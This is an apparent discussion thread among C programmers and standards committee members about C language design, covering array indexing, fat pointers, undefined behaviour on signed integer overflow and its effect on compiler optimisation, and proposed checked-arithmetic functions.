It could easily be added to C++, similarly to the way preincrement and postincrement are represented (which allows that obj++ and ++obj to be separate overloads).

   T &array_class::operator [] (int index) {
      // handles array[42]
   }

   T &array_class::operator [] (int index, int) {  // Fictional!!
      // handles 42[array]
   }
The dummy extra int parameter would mean "this overload of operator [] implements the flipped case, when the object is between the [ ] and the index is on the left".

C++ could easily have this; the technical barrier is almost nonexistent. (I wonder what the minimal diff against GNU C++ would be to get it going.)

I suspect that it's explicitly unwanted.


Ok, but who actually uses that?


The point is to demonstrate that std::array isn't an array.


What makes you so sure that if C got better arrays, those would be arrays, supporting a[i] i[a] commutativity and all?

That is predicated on equivalence to *(a + i) where a is a dumb pointer whose displacement commutes.


That is a quirk of C's arrays, no other language besides Assembly allows for that.

And even in Assembly, it depends on the CPU flavor which kind of memory accesses are available.


It depends entirely on the whims of the assembly language design. Assembly lanuages for the Motorola 68000 could allow operand syntax like like [A0 + offset], which could commute with [offset + A0], but the predominant syntax for that CPU family has it as offset(A0) which cannot be written A0(offset).

None of that changes what instruction is generated, just like C's quirk is one of pure syntax that doesn't affect the run-time.


Ok, fair. But for almost all practical purposes, std::array is an appropriate array replacement.


C++ has features in its syntax so that you can write objects that behave like arrays: support [] indexing via operator [], and can be passed around (according to whatever ownershihp discipline you want: duplication, reference counting). C++ provides such objects in its standard library, such as: std::basic_string<T> and std::vector<T>. There is a newer std::array also.


And depending on the compiler they can also bounds check, even in release builds, it is a matter of enabling the right build configuration flags.


Fat pointers in C would involve an ABI break for existing code, in that uintptr_t and uintmax_t would probably need to double in size.


It would presumably involve a new type that didn't exist in the current ABI. Those pointers would stay the same, and the new (twice as big) pointers would be used for the array feature.


On a given platform, the fat pointer type could have an easily defined ABI expressible in C90 declarations (whose ABI is then deducible accordingly).

For instance, complex double numbers can have an ABI which says that they look like struct { double re, im; };


The point of uintptr_t is that it's an integer type to which any pointer type can be cast. If you introduce a new class of pointers which are not compatible with uintptr_t, then suddenly you have pointers which are not pointers.


No, uintptr_t is an integer type to which any object pointer type can be converted without loss of information. (Strictly speaking, the guarantee is for conversion to and from void*.) And if an implementation doesn't have a sufficiently wide integer type, it won't define uintptr_t. (Likewise for intptr_t the signed equivalent.)

There's no guarantee that a function pointer type can be converted to uintptr_t without loss of information.

C currently has two kinds of pointer types: object pointer types and function pointer types. "Fat pointers" could be a third. And since a fat pointer would internally be similar to a structure, converting it to or from an integer doesn't make a whole lot of sense. (If you want to examine the representation, you can use memcpy to copy it to an array of unsigned char.)


Note that POSIX requires that object pointers and function pointers are the same for dlsym.


Surely you're not arguing that a bounded array is in fact a function rather than an object? The distinction between function and object pointers exists for Harvard architecture computers, which sort of exist (old Atmel AVR before they adopted ARM), but are not dominant.


You would be shocked by this language called C++ which is highly compatible with C and has "pointer to member" types that don't fit into a uintptr_t.

(Spoiler: no, there is no uintptr2_t).


Ditto uintmax_t. We do not want a uintmax2_t.


Existing code would be using normal pointers, not fat pointers, so there would be no ABI break. New code using fat pointers would know that they fit into a pair of uintptr_t, so the size of uintptr_t would not need to change either.


I don't think we want a uintptr_t and uintptr2_t.


IDK, it's not like it'd be an auto_ptr situation where you just don't use uintptr_t anymore and call the other one uintptr2_t. THere's different enough semantics that they both still make sesne.

Like, as someone who does real, real dirty stuff in Rust, usize as a uintptr equivalent gets used still even though fat pointers are about as well supported as you can imagine.


Or... deprecating unsafe or not-well-designed (but this is a bit subjective) ideas. Like... deprecating locales. (For why locales aren't well-designed ideas: https://github.com/mpv-player/mpv/commit/1e70e82baa9193f6f02...)


I agree which brought me into looking at Zig. A future version of C might disallow macros, preprocessor, disallow circular libraries, include a module system, but allow importing legacy libs like Zig. Also something like llvm so we can automatically do static analysis, transforms would be great.


I am back to learning Zig for the way it addresses some pitfalls in C, but really because it is so easy for cross-platform work. Compiling a program to a Windows exe on my 2011 iMac Pro and then running it on my Windows machine was so easy and the error messages are so helpful when they do occur.

I am not an expert at either C or Zig, so I would appreciate any feedback from anyone who can more intelligently compare the two.


The difference between "Undefined behavior", as the term is used in the Standard, and "Implementation-Defined Behavior", is that implementations are required to document at least some kind of guarantee about the behavior of the latter, even in cases where guaranteeing anything about behavior would be expensive, but nothing that could be guaranteed about the behavior would be useful.

What is needed is a category of actions where implementations (which I would call "conditionally-defined", where implementations would be required to indicate via "machine-readable" means [e.g. predefined macros, compiler intrinsics, etc.] all possible consequences (one of which would be UB), from which the implementation might choose in Unspecified fashion. If an implementation reports that it may process signed arithmetic using temporary values that may, at the compiler's leisure, be of an unspecified size that's larger than specified, but signed overflow will have no effect other than to yield values that may be larger than their type would normally be capable of holding, then the implementation would be required to behave in that fashion if integer overflow occurs.

In general, the most efficient code meeting application requirements could be generated by demanding semantics which are as loose as possible without increasing the amount of user code required to meet those requirements. Because different implementations are used for different purposes, so single set of behavioral guarantees would be optimal for all purposes. If compilers are allowed to reject code that demands guarantees an implementation doesn't support, then the choice of what guarantees to support could safely be treated as a Quality of Implementation issue, but the behavior of code that claims to support guarantees would be a conformance issue.


> - Some kind of module system, that allows code to be imported with the possibility of name collisions.

That doesn't particularly need modules -- just some form of

     namespace foo {
     }


You can very easily make a struct consisting of a pointer and length, is adding such a thing to the standard really a big deal? Personally, I don't see a problem with passing two arguments.


- In your example there's no guarantee that the length will be accurate, or that the data hasn't been modified independently elsewhere in the program.

- In other words you've created a fantastic shoe-gun. One update line missed (either length or data, or data re-used outside the struct) and your "simple" struct is a huge headache, including potential security vulnerabilities.

- Re-implementing a common error prone thing is exactly what language improvements should target.


I mean, this is C so "fantastic shoe-gun" is part of the territory. But in C you can wrap this vector struct in an abstract data type to try to prevent callers from breaking invariants.


>In your example there's no guarantee that the length will be accurate, or that the data hasn't been modified independently elsewhere in the program.

And having a special data-and-length type would make these guarantees... how? You're ultimately going to need to be able to create these objects from bare data and length somehow, so it's a case of garbage-in-garbage-out.


Declaring it with a custom struct:

    int raw_arr[4] = {0,0,0,0};
    struct SmartArray arr;
    arr.length = 4;
    arr.val = raw_arr;
    some_function(arr);
Smart declaration with custom type: (assume that they'll come up with a good syntax)

    smart_int_arr arr[4] = {0,0,0,0};
    some_function(arr);

With the custom struct, it requires the number `4` to be typed twice manually, while in the second it only needs a single input.


You actually never need to specify the size explicitly in C.

Here are some other ways to declare your struct without needing as much boiler plate per declaration.

    #define MAKE_SMARTARRAY(_smartarr, _array) \
            do {\
                _smartarr.val = (_array);\
                _smartarr.len = sizeof((_array))/sizeof((_array[0]));\
            }while(0)
    
    struct SmartArray
    {
        int *val;
        int len;
    };
    
    int main()
    {
        int array[] = {0,0,0,0};
        
        struct SmartArray arr = {.val = array, 
                                    .len = sizeof(array)/sizeof(array[0])};
        struct SmartArray arr2;
        struct SmartArray arr3;
        
        MAKE_SMARTARRAY(arr2, ((int[]){5,6,7,8}));
        MAKE_SMARTARRAY(arr3, array);
    
        return 0;
    }


How about having an attribute which, if applied to a structure that contains a `T*` and an integer type, would allow a `T[]` to be implicitly converted to that structure type?


In Delphi/FreePascal there are dynamic arrays (strings included) that are in fact fat pointers that hide inside more info than just length. All opaque types and work just fine with automatic lifecycle control and COW and whatnot.


What does clean up c mean?


Now that C2x plans to make two's complement the only sign representation, is there any reason why signed overflow has to continue being undefined behavior?

On a slightly more personal note: What are some undefined behaviors that you would like to turn into defined behavior, but can't change for whatever reasons that be?


Signed overflow being undefined behavior allows optimizations that wouldn't otherwise be possible

Quoting http://blog.llvm.org/2011/05/what-every-c-programmer-should-...

> This behavior enables certain classes of optimizations that are important for some code. For example, knowing that INT_MAX+1 is undefined allows optimizing "X+1 > X" to "true". Knowing the multiplication "cannot" overflow (because doing so would be undefined) allows optimizing "X*2/2" to "X". While these may seem trivial, these sorts of things are commonly exposed by inlining and macro expansion. A more important optimization that this allows is for "<=" loops like this:

> for (i = 0; i <= N; ++i) { ... }

> In this loop, the compiler can assume that the loop will iterate exactly N+1 times if "i" is undefined on overflow, which allows a broad range of loop optimizations to kick in. On the other hand, if the variable is defined to wrap around on overflow, then the compiler must assume that the loop is possibly infinite (which happens if N is INT_MAX) - which then disables these important loop optimizations. This particularly affects 64-bit platforms since so much code uses "int" as induction variables.


I've always thought that assuming such things should be wrong, because if you were writing the Asm manually, you would certainly think about it and NOT optimise unless you had a very good reason why it won't overflow. Likewise, I think that unless the compiler can prove that it, it should, like the sane human, refrain from making the assumption.


Well, by that reasoning, if you were coding in C, you would certainly think about it and ensure overflows won't happen.

The fact is that if the compiler encounters undefined behaviour, it can do basically whatever it wants and it will still be standard-compliant.


> for (i = 0; i <= N; ++i) { ... }

The worst thing is that people take it as acceptable that this loop is going to operate differently upon overflow (e.g. assume N is TYPE_MAX) depending on whether i or N are signed vs. unsigned.


Is this a real concern, beyond 'experts panel' esoteric discussion? Do folks really put a number into an int, that is sometimes going to need to be exactly TYPE_MAX but no larger?

I've gone a lifetime programming, and this kind of stuff never, ever matters one iota.


Yes, people really do care about overflow. Because it gets used in security checks, and if they don't understand the behavior then their security checks don't do what they expected.

https://gcc.gnu.org/bugzilla/show_bug.cgi?id=30475 shows someone going hyperbolic over the issue. The technical arguments favor the GCC maintainers. However I prefer the position of the person going hyperbolic.


That example was not 'overflow'. It was 'off by one'? That seems uninteresting, outside as you say the security issue where somebody might take advantage of it.


That example absolutely was overflow. The bug is, "assert(int+100 > int) optimized away".

GCC has the behavior that overflowing a signed integer gives you a negative one. But an if tests that TESTS for that is optimized away!

The reason is that overflow is undefined behavior, and therefore they are within their rights to do anything that they want. So they actually overflow in the fastest way possible, and optimize code on the assumption that overflow can't happen.

The fact that almost no programmers have a mental model of the language that reconciles these two facts is an excellent reason to say that very few programmers should write in C. Because the compiler really is out to get you.


Sure. Sorry, I was ambiguous. The earlier example of ++i in a loop I was thinking of. Anyway, yes, overflow for small ints is a real thing.


The very few times I've ever put in a check like that, I always do something like i < MAX_INT - 5 just to be sure, because I'm never confident that I intuitively understand off-by-one errors.


Same here. But I instead run a loop over a range around MAX_INT (or wherever the issue is) and print the result, so I know I'm doing what I think I'm doing. Exhaustive testing is quick, with a computer!


This isn't a good idea either: if you're dealing with undefined behavior the way the complier translates your code can change from version to version, so you could end up with a code that works with the current version of GCC but doesn't work on the next. Personally I don't agree with the way GCC and other comipers deal with UB, but this would be off topic.


Hm. May be off-topic by now. Incrementing an int is going to work the same on the same hardware, forever. Nothing the compile has any say in.


If a compiler decides that it's going to process:

    unsigned mul(unsigned short x, unsigned short y)
    { return x*y; }
in a way that causes calling code to behave in meaningless fashion if x would exceed INT_MAX/y [something gcc will sometimes actually do, by the way, with that exact function!], the hardware isn't going to have any say in that.


So in a corner case where you have a loop that iterates over all integer values (when does this ever happen?) you can optimize your loop. As a consequence, signed integer arithmetic is very difficult to write while avoiding UB, even for skilled practitioners. Do you think that's a useful trade-off, and do you think anything can be done for those of us who think it's not?


No, it's exactly the opposite. Without UB the compiler must assume that the corner case may arise at any time. Knowing it is UB we can assert `n+1 > n`, which without UB would be true for all `n` except INT_MAX. Standardising wrap-on-overflow would mean you can now handle that corner case safely, at the cost of missed optimisations on everything else.


I/we understand the optimization, and I'm sure you understand the problem it brings to common procedures such as DSP routines that multiply signed coefficients from e.g. video or audio bitstreams:

for (int i = 0; i < 64; i++) result[i] = inputA[i] * inputB[i];

If inputA[i] * inputB[i] overflowed, why are my credit card details at risk? The question is: can we come up with an alternate behaviour that incorporates both advantages of the i<=N optimization, as well as leave my credit card details safe if the multiplication in the inner loop overflowed? Is there a middle road?


Another problem is that there's no way to define it, because in that example the "proper" way to overflow is with saturating arithmetic, and in other cases the "proper" overflow is to wrap. Even on CPUs/DSPs that support saturating integer arithmetic in hardware, you either need to use vendor intrinsics or control the status registers yourself.


One could allow the overflow behavior to be specified, for example on the scope level. Idk, with a #pragma ? #pragma integer-overflow-saturate


I'd almost rather have a separate "ubsigned" type which has undefined behavior on overflow. By default, integers behave predictably. When people really need that extra 1% performance boost, they can use ubsigned just in the cases where it matters.


I don't know if I agree. Overflow is like uninitialized memory, it's a bug almost 100% of the time, and cases where it is tolerated or intended to occur are the exception.

I'd rather have a special type with defined behavior. That's actually what a lot of shops do anyways, and there are some niche compilers that support types with defined overflow (ADI's fractional types on their Blackfin tool chain, for example). It's just annoying to do in C, this is one of those cases where operator overloading in C++ is really beneficial.


> I don't know if I agree. Overflow is like uninitialized memory, it's a bug almost 100% of the time, and cases where it is tolerated or intended to occur are the exception.

Right, but I think the problem is that UB means literally anything can happen and be conformant to the spec. If you do an integer overflow, and as a result the program formats your hard drive, then it is acting within the C spec.

Now compiler writers don't usually format your hard drive when you trigger UB, but they often do things like remove input sanitation or other sorts of safety checks. It's one thing if as a result of overflow, the number in your variable isn't what you thought it was going to be. It's completely different if suddenly safety checks get tossed out the window.

When you handle unsanitized input in C on a security boundary, you must literally treat the compiler as a "lawful evil" accomplice to the attackers: you must assume that the compiler will follow the spec to the letter, but will look for any excuse to open up a gaping security hole. It's incredibly stressful if you know that fact, and incredibly dangerous if you don't.


> When you handle unsanitized input in C on a security boundary, you must literally treat the compiler as a "lawful evil" accomplice to the attackers: you must assume that the compiler will follow the spec to the letter, but will look for any excuse to open up a gaping security hole. It's incredibly stressful if you know that fact, and incredibly dangerous if you don't.

I'd say more chaotic evil, since the Standard has many goofy and unworkable corner cases, and no compiler tries to handle them all except, sometimes, by needlessly curtailing optimizations. Consider, for example:

    int x[2];
    int test(int *restrict a, int *b)
    {
      *a = 1;
      int *p = x+(a!=b);
      *p = 2;
      return *a;
    }
The way the Standard defines "based upon", if a and b are both equal to x, then p would be based upon a (since replacing a with a pointer to a copy of x would change the value of p). Some compilers that ignore "restrict" might generate code that accommodates the possibility that a and b might both equal x, but I doubt there are any that would generally try to optimize based on the restrict qualifier, but would hold off in this case.


Integer overflow is more than a 1% performance boost, as it lets you do a lot of things with loops.


I once did a stupid test using either a int or unsigned in a for loop variable the performance hit was about 1%. Problem is modern processors can walk, chew gum, and juggle all at the same time. Which tends to negate a lot of simplistic optimizations.

Compiler writers tend to assume the processor is a dumb machine. But modern ones aren't, they do a lot of resource allocation and optimization on the fly. And they do it in hardware in real time.


> modern processors can walk, chew gum, and juggle all at the same time

It's easier than it sounds. One of the major problems you usually run into when learning to juggle is that you throw the balls too far forward (their arc should be basically parallel to your shoulders, but it's easy to accidentally give them some forward momentum too), which pulls you forward to catch them. Being allowed to walk means that's OK.

(For the curious, there are three major problems you're likely to have when first learning to juggle:

1. I can throw the balls, but instead of catching them, I let them fall on the ground.

2. My balls keep colliding with one another in midair.

3. I keep throwing the balls too far forward.)

There's actually a niche hobby called "joggling" which, as the name implies, involves juggling while jogging.


> Compiler writers tend to assume the processor is a dumb machine.

A lot of C developers tend to assume the compiler is a dumb program ;) There are significant hoisting and vectorization optimizations that signed overflow can unlock, but they can't always be applied.


If C had real array types the compiler could do real optimizations instead of petty useless ones based on UB.


Fair, hence the push in many language for range-based for loops that can optimize much better.


Have you considered adding intrinsic functions for arithmetic operations that _do_ have defined behavior on overflow. Such as the overflowing_* functions in rust?


The semantics most programs need for overflow are to ensure that (1) overflow does not have intolerable side effects beyond yielding a likely-meaningless value, and (2) some programs may need to know whether an overflow might have produced an observably-arithmetically-incorrect result. A smart compiler for a well-designed language should in many cases be able to meet these requirements much more efficiently than it could rigidly process the aforementioned intrinsics.

A couple of easy optimizations, for example, that would be available to a smart compiler processing straightforwardly-written code to use automatic overflow checking, but not to one fed code that uses intrinsics:

1. If code computes x=yz, but then never uses the value of x, a compiler that notices that x is unused could infer that the computation could never be observed to produce an arithmetically-incorrect result, and thus there would be no need to check for overflow.

2. If code computes xy/z, and a compiler knows that y=z*2, the compiler could simplify the calculation to x+x, and would thus merely have to check for overflow in that addition. If code used intrinsics, the compiler would have to overflow check the multiplication, which on most platforms would be more expensive. If an implementation uses wrapping semantics, the cost would be even worse, since an implementation would have to perform an actual division to ensure "correct" behavior in the overflow case.

Having a language offer options for the aforementioned style of loose overflow checking would open up many avenues of optimization which would be unavailable in language that only over precise overflow checking or no overflow checking whatsoever.


oops, i meant the wrapping_* functions


If one wants a function that will compute xy/z when xy doesn't overflow, and yield some arbitrary value (but without other side-effects) when it does, wrapping functions will often be much slower than would be code that doesn't have to guarantee any particular value in case of overflow. If e.g. y is known to be 30 and z equal to 15, code using a wrapping multiply would need to be processed by multiplying the value by 30, computing a truncated the result, and dividing that by 15. If the program could use loosely-defined multiplication and division operators, however, the expression could be simplified to x+x.


I hadn’t understood the utility of undefined behaviour until reading this, thank you.


N is a variable. It might be INT_MAX so the compiler cannot optimise the loop for any value of N. Unless you make this UB.


No, the optimizations referred to include those that will make the program faster when N=100.


Just going to inject that this impacts a bunch of random optimizations and benchmarks. Just to fabricate an example:

    for (int i = 0; i < N; i += 2) {
        //
    }
Reasonably common idea but the compiler is allowed to assume the loop terminates precisely because signed overflow is undefined.

I’m not trying to argue that signed overflow is the right tool for the job here for expressing ideas like “this loop will terminate”, but making signed overflow defined behavior will impact the performance of numerics libraries that are currently written in C.

From my personal experience, having numbers wrap around is not necessarily “better” than having the behavior undefined, and I’ve had to chase down all sorts of bugs with wraparound in the past. What I’d personally like is four different ways to use integers: wrap on overflow, undefined overflow, error on overflow, and saturating arithmetic. They all have their places and it’s unfortunate that it’s not really explicit which one you are using at a given site.


Under C11, the compiler is still allowed to assume termination of a loop if the controlling expression is non-constant and a few other conditions are met.

https://stackoverflow.com/a/16436479/530160


The compiler assumes that the loop will alwasy terminate and that assumption is wrong, because in reality there is the possibility that the loop will not terminate, since the hardware WILL overflow.

So it's not the best solution. If we want to make this behaviour for optimizations (that are to me not worthed, giving the risk of potentially critical bugs) we must make that behavior explicit, not implicit: thus is the programmer that has to say to the compiler, I guarantee you that this operation will never overflow, if it does it's my fault.

We can agree that having a number that wraps around is not a particularly good choice. But unless we convince Intel in some way that this is bad and make the CPU trap on an overflow, so we can catch that bug, this is the behaviour that we have because is the behaviour of the hardware.


> The compiler assumes that the loop will alwasy terminate and that assumption is wrong, because in reality there is the possibility that the loop will not terminate, since the hardware WILL overflow.

The language is not a model of hardware, nor should it be. If you want to write to the hardware, the only option continues to be assembly.


> I guarantee you that this operation will never overflow, if it does it's my fault.

This is exactly what every C programmer does, all the time.


the compiler is allowed to assume the loop terminates precisely because signed overflow is undefined.

Just to be sure I understand the fine details of this -- what would the impact be if the compiler assumed (correctly) that the loop might not terminate? What optimization would that prevent?


If the compiler knows that the loop will terminate in 'x' iterations, it can do things like hoist some arithmetic out of the loop. The simplest example would be if the code inside the loop contained a line like 'counter++'. Instead of executing 'x' ADD instructions, the binary can just do one 'counter += x' add at the end.


What I’m driving at is, if the loop really doesn’t terminate, it would still be safe to do that optimization because the incorrectly-optimized code would never be executed.

I guess that doesn’t necessarily help in the “+=2” case, where you probably want the optimizer to do a “result += x/2”.

In general, I’d greatly prefer to work with a compiler that detected the potential infinite loop and flagged it as an error.


> …what would the impact be if the compiler assumed (correctly) that the loop might not terminate?

Loaded question—the compiler is absolutely correct here. There are two viewpoints where the compiler is correct. First, from the C standard perspective, the compiler implements the standard correctly. Second, if we have a real human look at this code and interpret the programmer’s “intent”, it is most reasonable to assume that overflow does not happen (or is not intentional).

The only case which fails is where N = INT_MAX. No other case invokes undefined behavior.

Here is an example you can compile for yourself to see the different optimizations which occur:

    typedef int length;
    int sum_diff(int *arr, length n) {
        int sum = 0;
        for (length i = 0; i < n; i++) {
            sum += arr[2*i+1] - arr[2*i];
        }
        return sum;
    }
At -O2, GCC 9.2 (the compiler I happened to use for testing) will use pointer arithmetic, compiling it as something like the following:

    int sum_diff(int *arr, length n) {
        int sum = 0;
        int *ptr = arr;
        int *end = arr + n;
        while (ptr < end) {
            sum += ptr[1] - ptr[0];
            ptr += 2;
        }
        return sum;
    }
At -O3, GCC 9.2 will emit SSE instructions. You can see this yourself with Godbolt.

Now, try replacing "int" with "unsigned". Neither of these optimizations happen any more. You get neither autovectorization nor pointer arithmetic. You get the original loop, compiled in the most dumb way possible.

I wouldn’t read into the exact example here too closely. It is true that you can often figure out a way to get the optimizations back and still use unsigned types. However, it is a bit easier if you work with signed types in the first place.

Speaking as someone who does some numerics work in C, there is something of a “black art” to getting good numerics performance. One easy trick is to switch to Fortran. No joke! Fortran is actually really good at this stuff. If you are going to stick with C, you want to figure out how to communicate to the compiler some facts about your program that are obvious to you, but not obvious to the compiler. This requires a combination of understanding the compiler builtins (like __builtin_assume_aligned, or __builtin_unreachable), knowledge of aliasing (like use of the "restrict" keyword), and knowledge of undefined behavior.

If you need good performance out of some tight inner loop, the easiest way to get there is to communicate to the compiler the “obvious” facts about the state of your program and check to see if the compiler did the right thing. If the compiler did the right thing, then you’re done, and you don’t need to use vector intrinsics, rewrite your code in a less readable way, or switch to assembly.

(Sometimes the compiler can’t do the right thing, so go ahead and use intrinsics or write assembly. But the compiler is pretty good and you can get it to do the right thing most of the time.)


Thanks for the code, this is exactly the kind of concrete example I was looking for!

You're correct about how it behaves with "int" and "unsigned", very interesting. But it occurs to me that on x64 we'd probably want to use 64-bit values. If I change your typedef to either "long" or "unsigned long" that seems to give me the SSE version of the code! (in x86-64 gcc 9.3) Why should longs behave so differently from ints?

I very much agree that getting good numerics performance out of the optimizer seems to be a black art. But does the design of C really help here, or are there ways it could help more? Does changing types from signed to unsigned, or int to long, really convey your intentions as clearly as possible?

I remain skeptical that undefined behaviour is a good "hook" for compilers to use to judge programmer intention, in order to balance the risks and rewards of optimizations. (Admittedly I'm not in HPC where this stuff is presumably of utmost importance!) It all seems dangerously fragile.

If you need good performance out of some tight inner loop, the easiest way to get there is to communicate to the compiler the “obvious” facts about the state of your program and check to see if the compiler did the right thing. If the compiler did the right thing, then you’re done, and you don’t need to use vector intrinsics, rewrite your code in a less readable way, or switch to assembly.

I strongly agree with the first part of this -- communicating your intent to the compiler is key.

It's the second part that seems really risky. Just because your compiler did the right thing this time doesn't mean it will continue to do so in future, or on a different architecture, and of course who knows what a different compiler might do? And if you end up with the "wrong thing", that may not just mean slow code, but incorrect code.


> But does the design of C really help here, or are there ways it could help more?

I’m sure there are ways that it could help more. But you have to find an improvement that is also feasible as an incremental change to the language. Given the colossal inertia of the C standard, and the zillions of lines of existing C code that must continue to run, what can you do?

What I don’t want to see are tiny, incremental changes that make one small corner of your code base slightly safer. Most people don’t want to see performance regressions across their code base. That doesn’t leave a lot of room for innovation.

> It all seems dangerously fragile.

If performance is critical you run benchmarks on CI to detect regression.

> It's the second part that seems really risky.

It is safer than the alternatives, unless you write it in a different language. The “fast” code here is idiomatic, simple C the way you would write it in CS101, with maybe a couple builtins added. The alternative is intrinsics, which poses additional difficulty. Intrinsics are less portable and less safe. Less safe because their semantics are often unusual or surprising, and also less safe because code written with intrinsics is hard to read and understand (so if it has errors, they are hard to find). If you are not using intrinsics or the autovectorizer, then sorry, you are not getting vector C code today.

This is also not, strictly speaking, just an HPC concern. Ordinary phones, laptops, and workstations have processors with SIMD for good reason—because they make an impact on the real-life usability of ordinary people doing ordinary tasks on their devices.

So if we can get SIMD code by writing simple, idiomatic, and “obviously correct” C code, then let’s take advantage of that.


I can certainly understand the value in allowing compilers to perform integer arithmetic using larger types than specified, at their leisure, or behave as though they do. Such allowance permits `x+y > y` to be replaced with `x > 0`, or `x30/15` to be replaced with `x2`, etc. and also allows for many sorts of useful loop induction.

Some additional value would be gained by allowing stores to automatic objects whose address isn't taken to maintain such extra range at their convenience, without any requirement to avoid having such extra range randomly appear and disappear. Provided that a program coerces values into range in when necessary, such semantics would often be sufficient to meet application requirements without having to prevent overflow.

What additional benefits are achieved by granting compilers unlimited freedom beyond that? I don't see any such benefits that would be worth anything near the extra cost imposed on programmers.


What should be relevant is not programmer "intent", but rather whether the behavior would likely match the that of an implementation which give that describe behavior of actions priority over parts of the Standard that would characterize them as "Undefined Behavior".


You shouldn't even need compiler builtins, just perform undefined behavior on a branch:

  if ((uintptr_t)ptr & alignment) {
      char *p = NULL;
      printf("%c\n", *p);
  }


Some instances of undefined behavior at translation time can effectively be avoided in practice by tightening up requirements on implementations to diagnose them. But strictly speaking, because the standard allows compilers to continue to chug along even after an error and emit object code with arbitrary semantics, turning even such straightforward instances into constraint violations (i.e., diagnosable errors) doesn't prevent UB.

It might seem like defining the semantics for signed overflow would be helpful but it turns out it's not, either from a security view or for efficiency. In general, defining the behavior in cases that commonly harbor bugs is not necessarily a good way to fix them.


Maybe someone else can respond to this as well, but I feel like the primary reason signed overflow is still undefined behavior is because so many optimizations depend upon the undefined nature of signed integer overflow. My advice has always been to use unsigned integer types when possible.

Personally, I would like to get rid of many of the trap representations (e.g., for integers) because there is no existing hardware in many cases that supports them and it gives implementers the idea that uninitialized reads are undefined behavior.

On the other hand, I just wrote a proposal to WG14 to make zero-byte reallocations undefined behavior that was unanimously accepted for C2x.


> My advice has always been to use unsigned integer types when possible.

Unsigned types have their own issues, though: they overflow at "small" values like -1, which means that doing things like correctly looping "backwards" over an array with an unsigned index is non-trivial.

> On the other hand, I just wrote a proposal to WG14 to make zero-byte reallocations undefined behavior that was unanimously accepted for C2x.

You're saying that realloc(foo, 0) will no longer free the pointer?


realloc(foo, 0) was changed to no longer free in C99. A rant on the subject: https://github.com/Tarsnap/libcperciva/commit/cabe5fca76f6c3...


Another approach would be a standard library of arithmetic routines that signal overflow.

If people used them while parsing binary inputs that would prevent a lot of security bugs.

The fact that this question exists and is full of wrong answers suggests a language solution is needed: https://stackoverflow.com/questions/1815367/catch-and-comput...


Take a look at N2466 2020/02/09 Svoboda, Towards Integer Safety which has some support in the committee:

http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2466.pdf

(signal is a strong word... maybe indicate?)


You can enable this in GCC on a compilation unit basis with `-fsanitize=signed-integer-overflow`. In combination with `-fsanitize-undefined-trap-on-error`, the checks are quite cheap (on x86, usually just a `jo` to a `ud2` instruction).

(Note that while `-ftrapv` would seem equivalent, I've found it to be less reliable, particularly with compile-time checking.)


And clang!


Microsoft in particular has a simple approach to this with things like DWordMult().

    if (FAILED(DWordMult(a, b, &product)))
    {
       // handle error
    }


Clang and GCC's approach for these operations is even nicer FWIW (__builtin_[add/sub/mul]_overflow(a, b, &c)), which allow arbitrary heterogenous integer types for a, b, and c and do the right thing.

I know there's recently been some movement towards standardizing something in this direction, but I don't know what the status of that work is. Probably one of the folks doing the AUA can update.


We've been discussing a paper on this (http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2466.pdf) at recent meetings and it's been fairly well-received each time, but not adopted for C2x as of yet.


It feels like it would be a real shame to standardize something that gives up the power of the Clang/GCC heterogeneous checked operations. We added them in Clang precisely because the original homogeneous operations (__builtin_smull_overflow, etc) led to very substantial correctness bugs when users had to pick a single common type for the operation and add conversions. Standardizing homogeneous operations would be worse than not addressing the problem at all, IMO. There's a better solution, and it's already implemented in two compilers, so why wouldn't we use it?

The generic heterogeneous operations also avoid the identifier blowup. The only real argument against them that I see is that they are not easily implementable in C itself, but that's nothing new for the standard library (and should be a non-goal, in my not-a-committee-member opinion).

Obviously, I'm not privy to the committee discussions around this, so there may be good reasons for the choice, but it worries me a lot to see that document.


>the original homogeneous operations (__builtin_smull_overflow, etc) led to very substantial correctness bugs when users had to pick a single common type for the operation and add conversions.

Hi Stephen, thank you for bringing this to our attention. David Svoboda and I are now working to revise the proposal to add a supplemental proposal to support operations on heterogeneous types. We are leaning toward proposing a three-argument syntax, where the 3rd argument specifies the return type, like:

    ckd_add(a, b, T)
where a and b are integer values and T is an integer type, in addition to the two-argument form

    ckd_add(a, b)
(Or maybe the two-argument and three-argument forms should have different names, to make it easier to implement.)


Glad to hear it, looking forward to seeing what you come up with! The question becomes, once you have the heterogeneous operations, is there any reason to keep the others around (my experience is that they simply become a distraction / attractive nuisance, and we're better off without them, but there may be use cases I haven't thought of that justify their inclusion).


When David and I are done revising the proposal, we would like to send you a copy. If you would be interested in reviewing, can you please let us know how to get in touch with you? David and I can be reached at {svoboda,weklieber} @ cert.org.

>once you have the heterogeneous operations, is there any reason to keep the others around

The two-argument form is shorter, but perhaps that isn't a strong enough reason to keep it. Also, requiring a redundant 3rd argument can provide an opportunity for mistakes to happen if it gets out of sync with the type of first two arguments.

As for the non-generic functions (e.g., ckd_int_add, ckd_ulong_add, etc.), we are considering removing them in favor of having only the generic function-like macros.


Being brutal heterodox: STOP WRITING SIGNED ARITHMETIC.

Your code assumes that negating a negative value is positive. Your division check forgot about INT_MIN / -1. Your signed integer average is wrong. You confused bitshift with division. etc. etc. etc.

Unsigned arithmetic is tractable and should be treated with caution. Signed arithmetic is terrifying and should be treated with the same PPE as raw pointers or `volatile`.

This applies if arithmetic maps to CPU instructions, but not to Python or Haskell or etc. If you have automatic bignums, signed arithmetic is of course better.


> Now that C2x plans to make two's complement the only sign representation, is there any reason why signed overflow has to continue being undefined behavior?

I presume you'd want signed overflow to have the usual 2's-complement wraparound behavior.

One problem with that is that a compiler (probably) couldn't warn about overflows that are actually errors.

For example:

    int n = INT_MAX;
    /* ... */
    n++;
With integer overflow having undefined behavior, if the compiler can determine that the value of n is INT_MAX it can warn about the overflow. If it were defined to yield INT_MIN, then the compiler would have to assume that the wraparound was what the programmer intended.

A compiler could have an option to warn about detected overflow/wraparound even if it's well defined. But really, how often do you want wraparound for signed types? In the code above, is there any sense in which INT_MIN is the "right" answer for any typical problem domain?


> In the code above, is there any sense in which INT_MIN is the "right" answer for any typical problem domain?

There is no answer different that INT_MIN that would be right and make sense, i.e. the natural properties of the + operator (associativity, commutativity) are respected. Thus, by want of another possibility, INT_MIN is precisely the right answer to your code.

I read your code and it seems to me very clear that INT_MIN is exactly what the programmer intended.


> I read your code and it seems to me very clear that INT_MIN is exactly what the programmer intended.

Well, I'm the author and that's not what I intended.

